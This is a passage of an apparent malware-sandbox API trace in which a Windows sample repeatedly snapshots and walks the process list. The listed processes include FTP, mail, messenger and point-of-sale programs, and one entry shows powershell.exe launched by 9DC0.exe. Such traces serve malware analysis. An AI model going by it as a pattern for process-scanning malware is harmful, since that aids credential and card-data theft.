th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0223.684] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0223.686] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0223.687] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0223.689] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0223.690] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0223.692] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0223.693] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0223.695] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0223.696] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0223.701] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0223.702] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0223.704] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0223.705] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0223.707] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0223.709] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0223.711] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0223.712] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0223.714] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0223.717] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0223.719] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0223.740] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0223.742] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0223.744] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0223.746] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0223.748] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0223.750] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0223.752] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0223.754] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0223.756] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0223.758] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0223.760] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0223.761] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0223.763] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0223.766] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0223.768] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0223.770] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0223.772] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0223.780] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0223.782] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0223.784] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0223.786] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0223.789] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0223.791] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0223.793] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0223.794] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0223.796] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0223.798] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0223.800] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0223.802] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0223.804] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0223.806] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0223.808] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0223.810] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0223.824] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0223.826] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0223.860] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0223.862] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0223.864] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0223.866] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.868] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.870] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0223.871] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.873] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.875] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0223.877] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0223.878] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0223.880] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0223.882] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0223.884] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0223.886] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0223.888] CloseHandle (hObject=0x1eb8) returned 1 [0223.888] Sleep (dwMilliseconds=0x64) [0223.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0223.917] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.918] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.920] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.921] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.923] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.924] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.927] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.929] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.931] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.932] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.934] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.935] 